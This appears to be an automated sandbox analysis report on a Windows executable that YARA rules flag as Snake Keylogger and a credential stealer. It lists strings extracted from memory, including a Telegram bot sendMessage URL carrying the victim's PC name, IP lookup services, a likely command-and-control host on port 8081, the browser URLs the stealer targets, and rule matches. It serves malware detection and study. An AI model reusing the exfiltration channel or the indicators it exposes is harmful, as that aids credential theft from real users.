                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeString found in binary or memory: http://checkip.dyndns.org/q
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeString found in binary or memory: http://varders.kozow.com:8081
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeString found in binary or memory: https://api.telegram.org/bot
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20a
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C08000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enXL
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeString found in binary or memory: https://reallyfreegeoip.org/xml/
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/XL
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                          Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                          Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00ECC1460_2_00ECC146
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00ECD2780_2_00ECD278
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00EC53620_2_00EC5362
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00ECC4680_2_00ECC468
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00ECC7380_2_00ECC738
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00EC29E00_2_00EC29E0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00EC69A00_2_00EC69A0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00ECE9880_2_00ECE988
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00ECCA080_2_00ECCA08
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00ECCCD80_2_00ECCCD8
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00EC9DE00_2_00EC9DE0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00EC6FC80_2_00EC6FC8
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00ECCFAA0_2_00ECCFAA
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00ECF62F0_2_00ECF62F
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00ECE97A0_2_00ECE97A
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00ECFA880_2_00ECFA88
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00EC3E090_2_00EC3E09
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_067086880_2_06708688
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_067012880_2_06701288
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_067041680_2_06704168
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_06708D580_2_06708D58
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_06700BA80_2_06700BA8
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_067019700_2_06701970
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670E9500_2_0670E950
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670F6580_2_0670F658
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670F6490_2_0670F649
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670C6900_2_0670C690
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670C6800_2_0670C680
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670D7F00_2_0670D7F0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670D7EF0_2_0670D7EF
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670E4F80_2_0670E4F8
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670E4E80_2_0670E4E8
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670127A0_2_0670127A
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670C2380_2_0670C238
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670F2000_2_0670F200
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670D3980_2_0670D398
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670D38A0_2_0670D38A
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_067000400_2_06700040
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670E0A00_2_0670E0A0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670E0910_2_0670E091
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_067041590_2_06704159
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670F1F00_2_0670F1F0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670CF400_2_0670CF40
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670CF310_2_0670CF31
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670CF3F0_2_0670CF3F
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670DC480_2_0670DC48
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670DC380_2_0670DC38
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_06707CE00_2_06707CE0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670BDE00_2_0670BDE0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670BDCF0_2_0670BDCF
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670EDA80_2_0670EDA8
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670ED990_2_0670ED99
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670CAE80_2_0670CAE8
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670CAD90_2_0670CAD9
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670FAB00_2_0670FAB0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670FAA00_2_0670FAA0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_06700B970_2_06700B97
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_067019620_2_06701962
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_0670E9420_2_0670E942
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 2620
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000000.1233400753.0000000000746000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1509663573.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeBinary or memory string: OriginalFilenameRemington.exe4 vs 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                          Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                          Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
